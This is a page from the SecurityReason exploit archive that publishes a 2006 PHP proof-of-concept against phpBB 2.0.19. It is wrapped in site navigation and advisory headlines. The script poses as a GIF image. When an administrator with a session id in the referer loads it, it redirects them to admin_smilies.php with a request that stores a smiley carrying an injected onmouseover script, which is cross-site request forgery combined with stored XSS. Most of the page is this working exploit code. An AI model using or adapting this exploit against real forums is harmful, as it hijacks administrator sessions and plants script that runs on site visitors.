SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : SecurityReason Exploit

Arrow  Topic : phpBB 2.0.19 CSRF Image
Arrow  ExploitAlert : 6
Arrow  Credit : Maksymilian Arciemowicz
Arrow  Date : 8.2.2006

  Download

FREEWARE Network Scanner Security Events Montoring
Detect network vulnerabilities. Freeware dld! Monitor event logs for security. Dld 30-day eval!

Arrow  Exploit Code :  

<?php
# SecurityReason.Com writed by Maksymilian Arciemowicz
# http://securityreason.com/achievement_securityalert/31 or GPG
http://securityreason.com/achievement_securityalert/31/1
#
# post :x: to see xss OR set request for admin

$sid='';
$url = parse_url(getenv('HTTP_REFERER'));

preg_match('/(\/.*)\//', $url['path'], $path);
preg_match('#sid\=?([0-9a-z]*)#i', $url['query'], $sid);

if($sid[1]==""){

$image="R0lGODlhUABQAIcAAAAAAAEBAQMDAwQEBAYGBgcHBwgICAkJCQoKCgsLCwwMDA0NDQ
4ODhAQEBERERISEhMTExUVFRgYGBoaGhsbGxwcHB0dHR4eHh8fHyAgICEhISIiIiMjIyQkJCUlJ
SYmJicnJygoKCkpKSoqKisrKywsLC0tLS4uLi8vLzAwMDIyMjMzMzY2Njg4ODw8PEBAQEJCQkRE
REVFRUZGRkdHR0pKSktLS0xMTE1NTU9PT1FRUVNTU1RUVFZWVldXV1lZWVpaWltbW11dXV5eXmF
hYWJiYmNjY2VlZWZmZmhoaGlpaWxsbG1tbW5ubm9vb3FxcXJycnV1dXd3d3h4eHl5eXt7e35+fu
4CAu4EBO4FBe4HB+4LC+4NDe4ODu8SEu8UFO8VFe8ZGe8cHO8eHvAiIvAkJPAnJ/AsLPEuLvE4O
PI9PfJBQfJDQ/JLS/NOTvNPT/NRUfNSUvNXV/NYWPRbW/RdXfRiYvRmZvVra/VtbfV3d/Z5eYKC
goSEhIeHh4qKioyMjI6Ojo+Pj5GRkZOTk5aWlpeXl5iYmJmZmZqamp2dnZ6enp+fn6CgoKGhoaK
ioqOjo6SkpKampqioqKmpqaurq66urrCwsLKysrOzs7S0tLe3t7i4uLm5ubq6uru7u729vb6+vr
+/v/aCgvaGhvePj/eTk/iWlviXl/idnfienvikpPmoqPmpqfmqqvmsrPmysvq1tfq/v8DAwMLCw
sPDw8TExMfHx8jIyMnJycrKysvLy8zMzM3Nzc7Ozs/Pz9DQ0NHR0dTU1NXV1dbW1tfX19nZ2dra
2tvb293d3d7e3vrAwPvDw/vLy/vOzvzS0vzU1PzW1vzX1/zZ2fza2vzb2/zd3eDg4OHh4eLi4uT
k5Obm5ufn5+rq6uvr6+zs7O7u7u/v7/zg4P3i4v3n5/3u7vDw8PHx8fLy8vT09PX19ff39/7w8P
7x8f7y8v709P719fn5+fv7+/75+f77+/z8/P78/P7+/v///wAAAAAAAAAAAAAAAAAAAAAAAAAAA
CH5BAAAAP8ALAAAAABQAFAAAAj/APEJHEiwoMGDCBMqXMiwocOHECNKnEixosWLGDNq3MixY0RF
RGp5FKhu0hEiKJdE8jayIBEAi0bGa3LABREYEwIEgNSSIEiR+H5q1ISACTh864zZgNkT4cuYGZc
AMDQwHJWQAuPVInTkTzKCJU/6WXRMqEChIEHNWhISrQcANolgcjLl3EBORCg5lPqhD6Zi6AjGg5
IBhw8JJmZlpUmDSAoBi54OlPzyAwMAMCUrehs3VA4Cl7LmQPDJ4a4XBAAMgMAiEDeBtRoAkncvE
4MXdjkh2BGY2KJbkgVSBpACZcjgwfFJGvBDHr5eDnA/PDepSIsJBgLcsOtnwA2UQRoQ/8iEbwqA
RC6ZCmf6Ev1k9cm5kZAgDN+fAIomplPmKQWBTfi8FJdxIiW3HlQBsqfegQwOFAUAfqjzQgfZPAQ
SgAKtA4MDvdgHgCAEnWMOPn6clx6CwyGYIFQG1sKACpgw0MQ9DxFRwCHf3KNOJhEgEQ8+wlDAwS
fyUPdCJPjoIoEO2dQjDCS3SLWEOudk4oKCKgZ3BACBOEdSDASUwABQDk2xAAIk+PCCBUBcI9A9l
ryAAQ4uKPDCL/jcg4gFHeBwwQOQ4PIBAi/UIEQLWBIUnCUURIADVkEFAEAM6kB0Ti6OLKJpLT+G
KIqmmdj1pjCZYhLMUcNkymktZOHD6jEEvf86aqat4oNNBgNI0tSuB0FHwmu8BiuQeVMIK2w9nTi
ijbHMNuvss9AmlIod1FKbxzL2RKuRHVeoQe0cYniBCo3aXsStKm82U8YY1ZRr7hXovjkHFrAMpB
VXXvlkHBGDAIvPMFUQcUQhtiyLj1Z+HKGIwUERAUotUxBRhZsUnTsQPGt8AU1WhBmGmGJnoTSEC
gPI0M2/Ikjggw8pTNDIwVBU0AMRKqCAy3o4sDVDAD1UOpHF9IxDChdwwAObbLTZJl1B2pCMCT5V
ACDFOfecMwueLi5RDz6zMODDjy9RhU82GiAgSsXd2uEGGVe8Qc5A3X1HRHjjCTTLSShtwNQgATD
/wEIUnApUIlTosABBfcHJg8OCEXHrrR1ydGHGM+8NiJJIvHDgQAtDEPFWTNz4kBoADBhhV3JBCP
B0cgZCZDE+9pzSBRviCPTHhyGOaB4f6TS4IyE/LFAAKB66B44KFiCz4nsqug7vQPbsgYUd7gApJ
JFGIrllhPHMkgJTm+SSYzIooLBskDt4cw8kBDxBI+uMOx+vQO7gocUe9sApJ5124jkLCg14wQ1G
QAGmWAEEJuABCSxQiTcx4gQr4AEI2tSg5U2EGaqgRkHc4YpXvEMg5/jUIkI1EG1MYhGOEAYtWrU
OZJwwheQSiAkXETjY1MpVN3SXDnfIwx768IdADKIQ/4dIxCIa8YhITCKzwJGJRUSMCEtIhCNycZ
SCTKtaWLTDHVjRDndxIxAqGB1mxrgAFSiBGATh1hXWyEY2amENy9DWNWIgqTHa0Y4qUmMb93gFN
EwDWup4yR0HiZk88vGQdJjHs0SBgDESIE1EGEILQsCAOhqSjY8DVxu/II1nEcKOUsiRQNLxDWAE
ggQBuOQa43UPdbExC/Vy1pbGKIUqMm0QZMKHHp8nrzay4lklcqQKooAJZfQuIbucH8bY2AVnPCs
TYhzjACbQAiVEAhkxHEgy8RE0UmyBjWd4m7POUQNCjjEAFpiCvwSyS2+trY1YKEW0rkGEaA4yAD
JY5y4Pef+FNpRDWyV5wQLMCYAABCKN/GRjHKyhw0spYgkw0IAB7vgrbSZ0jaPIVg/XsQ1P6KCOA
DAA8djZRjXUAQxt9EIsouUIRWDzINsgwRjNZlE2quIeptBCG/0ILSKg0wiR8MU21oGP/TxCAmMk
wTdqukp8wEMOe5SD0ZwlyIIuQAMwkOQEBjBGAVAhhtvExzTQ0EYtmCKbwqoqQTHTg8AwlZf4aEU
X2hgGWTgrCWvFDAOA8BWE2hR6ethjGmrHLGP8AQcTSMAdAwABH8yiU35t6kDIsYY92mGqzJKHMm
5BK01NQhiQLQgGVUFaDRIkGqRN7SrYocTWuva1sI2tbGdL29oG2va2QgwIADs=";

header('Content-type: image/gif');

echo base64_decode($image);
exit;

} else {

header("Location:
".$url['scheme']."://".$url['host'].$path[0]."admin_smilies.php?mode=savene
w&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c\"%20onmouseover
=\"alert('SecurityReason.Com')\"%20&sid=".$sid[1]); # REQUEST!

}
?>
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...
Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration
PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass
Copyright © SecurityReason.com. All Rights Reserved.